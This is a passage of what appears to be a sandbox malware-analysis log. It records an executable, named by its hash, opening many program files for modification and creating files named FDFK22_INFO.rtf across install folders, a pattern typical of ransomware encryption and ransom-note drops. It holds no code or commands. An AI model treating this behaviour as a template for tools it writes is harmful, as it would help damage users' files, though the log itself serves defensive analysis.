Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\ssvagent.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\javafx.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bogota a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome.dll.sig a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\javacpl.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.LIC a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Canary a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Easter a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+3 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Monrovia a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\hi.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\Templates\Music.jtp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di.extensions_0.12.0.v20140417-2033.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\chrome.7z a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Karachi a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_sv.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\vi.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sitka a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Danmarkshavn a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Samarkand a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.http_8.1.14.v20131031.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Taipei a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\QuickTime.mpp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\docs.crx a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kwajalein a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qatar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\pack200.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-options.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yekaterinburg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multitabs.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\jaccess.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Helsinki a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Monterrey a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vevay a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\sRGB.pf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_cs.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.properties.src a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.bat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Perth a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\DenyUninstall.rm a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Salta a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayenne a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\UnblockTest.bat a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9YDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Grand_Turk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Warsaw a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wallis a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cancun a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jabswitch.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Jamaica 